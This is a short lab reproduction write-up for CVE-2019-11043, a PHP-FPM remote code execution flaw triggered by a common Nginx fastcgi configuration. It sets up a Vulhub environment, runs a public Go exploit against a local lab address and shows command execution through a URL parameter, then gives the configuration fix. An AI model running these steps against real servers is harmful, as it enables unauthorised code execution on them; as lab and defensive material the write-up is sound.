CVE-2019-11043 - PHP-FPM Remote Code Execution Vulnerability
Vulnerability description
Andrew Danau, a security researcher from Wallarm, accidentally sent %0a (line break) to the server during the Real World CTF held on September 14-16, and the server returned an abnormal message. Thus found this 0day vulnerability
A remote code execution vulnerability exists when Nginx uses a specific fastcgi configuration, but this configuration is not the default configuration of Nginx. Only when the fastcgi_split_path_info field is configured as ^(.+?\.php)(/.*)$;, the attacker can create a remote code execution vulnerability through a carefully constructed payload. Since this configuration is widely used, it is more harmful
The version affected by the vulnerability
When the Nginx + php-fpm server has the following configurations, remote code execution vulnerabilities will appear
location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
...
}
Vulnerability recurrence
This reproduction adopts the Vulhub shooting range environment, and a Vulhub shooting range needs to be built locally
Enter the shooting range environment and start the environment with the following command:
docker-compose up -d
Check if the environment port is open
docker-compose ps
Access target URL path:http://192.168.0.109:8080/
Download the exploit poc: https://github.com/neex/phuip-fpizdam
Go to the directory and execute the following command (go language environment is required)
go run . "http://192.168.0.109:8080/index.php"
visit websitehttp://192.168.0.109:8080/index.php?a=id
Note: Since /index.php?a=php needs to visit several times to access the polluted process.
Bug fixes
Delete the following configuration in the Nginx configuration file:
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_paramPATH_INFO $fastcgi_path_info;